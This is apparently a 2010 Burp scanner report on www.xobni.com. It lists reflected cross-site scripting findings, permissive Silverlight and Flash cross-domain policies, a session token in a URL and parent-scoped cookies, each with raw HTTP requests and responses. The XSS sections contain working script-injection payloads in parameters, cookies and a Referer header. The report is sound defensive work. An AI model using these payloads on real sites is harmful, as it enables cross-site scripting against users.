The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e945"><script>alert(1)</script>facb1ebd9ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr-fr/account/gadget_welcome?5e945"><script>alert(1)</script>facb1ebd9ec=1 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/developer/?lc=fr
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:19:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11195

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<input type="hidden" name="rd" value="/fr-fr/account/gadget_welcome?5e945"><script>alert(1)</script>facb1ebd9ec=1">
...[SNIP]...

2.5. http://www.xobni.com/download [trigger_id cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download

Issue detail

The value of the trigger_id cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 543ee"%3balert(1)//aaae5e31f92 was submitted in the trigger_id cookie. This input was echoed as 543ee";alert(1)//aaae5e31f92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /download HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362543ee"%3balert(1)//aaae5e31f92; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.2.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362543ee%22%3Balert%281%29%2F%2Faaae5e31f92; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9879

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<!--
function beginDownload() {
setTimeout("window.location='http://www.xobni.com/push/12772?t=10432362543ee";alert(1)//aaae5e31f92'",1000);
}
//-->
...[SNIP]...

2.6. http://www.xobni.com/download [trigger_id cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download

Issue detail

The value of the trigger_id cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3c20"><script>alert(1)</script>4232c10c30f was submitted in the trigger_id cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /download?lc=de HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362c3c20"><script>alert(1)</script>4232c10c30f; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362c3c20%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4232c10c30f; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9780

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<a href="http://www.xobni.com/push/12772?t=10432362c3c20"><script>alert(1)</script>4232c10c30f" class="downloadcta">
...[SNIP]...

2.7. http://www.xobni.com/download/ [trigger_id cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/

Issue detail

The value of the trigger_id cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6bf6"><script>alert(1)</script>466eba28b was submitted in the trigger_id cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /download/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362f6bf6"><script>alert(1)</script>466eba28b; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362f6bf6%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E466eba28b; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9888

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<a href="http://www.xobni.com/push/12772?t=10432362f6bf6"><script>alert(1)</script>466eba28b" class="downloadcta">
...[SNIP]...

2.8. http://www.xobni.com/download/12341 [trigger_id cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/12341

Issue detail

The value of the trigger_id cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe22"><script>alert(1)</script>069ab2c9ffb was submitted in the trigger_id cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /download/12341 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/support/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362bfe22"><script>alert(1)</script>069ab2c9ffb; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362bfe22%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E069ab2c9ffb; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12341; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9840

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<a href="http://www.xobni.com/push/12341?t=10432362bfe22"><script>alert(1)</script>069ab2c9ffb" class="downloadcta">
...[SNIP]...

2.9. http://www.xobni.com/download/latest [trigger_id cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/latest

Issue detail

The value of the trigger_id cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b652"><script>alert(1)</script>8107f0e982d was submitted in the trigger_id cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /download/latest HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/support/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=104323628b652"><script>alert(1)</script>8107f0e982d; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:09:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=104323628b652%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8107f0e982d; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9846

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<a href="http://www.xobni.com/push/12772?t=104323628b652"><script>alert(1)</script>8107f0e982d" class="downloadcta">
...[SNIP]...

3. Silverlight cross-domain policy

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.xobni.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.xobni.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:12:42 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 04:01:13 GMT
ETag: "3b03be-158-486fea01e5440"
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*"/>
</allow-from>

...[SNIP]...

4. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /press/coverage

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /press/coverage HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 178670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni News Room:
...[SNIP]...
<p><a href="http://www.crn.com/software/221800211;jsessionid=T0WQC1YJMU5QVQE1GHOSKHWATMY32JVN" target="_blank">
                   <strong>
...[SNIP]...

5. Flash cross-domain policy

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.xobni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xobni.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 18:49:14 GMT
ETag: "3b03bf-d4-477175e20be80"
Accept-Ranges: bytes
Content-Length: 212
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.xobniqa.com"/>
<allow-access-from domain="*.xobni.com"/>
<allow-access-from domain="10.23.23.*"/>
</cross-doma
...[SNIP]...

6. Cookie scoped to parent domain
There are 7 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


6.1. http://www.xobni.com/support/troubleshooter.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /support/troubleshooter.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tree_session_id=455353; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/troubleshooter.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tree_session_id=455353; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Length: 3952
Connection: close
Content-Type: text/html; charset=UTF-8


<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<TITLE>Troubleshooter</TITLE>
<style type="text/css">

.rounded-tr {
   position:absolute;top:0px;right:0px;
}
.round
...[SNIP]...

6.2. http://www.xobni.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.1.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 21477

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...

6.3. http://www.xobni.com/download

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.2.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9823

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...

6.4. http://www.xobni.com/download/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9767

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...

6.5. http://www.xobni.com/download/12341

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/12341

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
downloaded_version=12341; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/12341 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12341; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9877

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...

6.6. http://www.xobni.com/download/latest

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/latest

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/latest HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
